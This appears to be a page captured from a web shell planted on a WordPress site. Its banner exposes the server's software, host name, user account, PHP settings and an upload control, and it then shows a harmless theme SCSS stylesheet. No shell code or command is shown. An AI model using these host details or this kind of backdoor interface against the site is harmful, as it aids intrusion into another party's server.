HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/BOoms/pro-oils.be/wwwroot/wp-content/themes/neve/assets/scss/elements/_page.scss
.wrapper {
  display: flex;
  min-height: 100vh;
  flex-direction: column;
  overflow: hidden;
}

.neve-main {
  flex: 1 auto;
  min-height: 1px;
}

.archive-container {
  padding-top: $spacing-sm;
}

.nv-page-title-wrap.nv-big-title .nv-page-title {
  padding-bottom: $spacing-xs;
  border-bottom: $muted-border;
  margin-bottom: $spacing-sm;

  h1 {
    line-height: 1.3em;
    margin-bottom: 0;

    & + p {
      margin-bottom: 0;
    }
  }
}

.nv-content-none-wrap {
  margin-bottom: $spacing-lg;
}

@mixin page--laptop() {
  .archive-container {
    padding-top: 30px;
  }

  .nv-content-none-wrap {
    margin-bottom: 0;
  }
}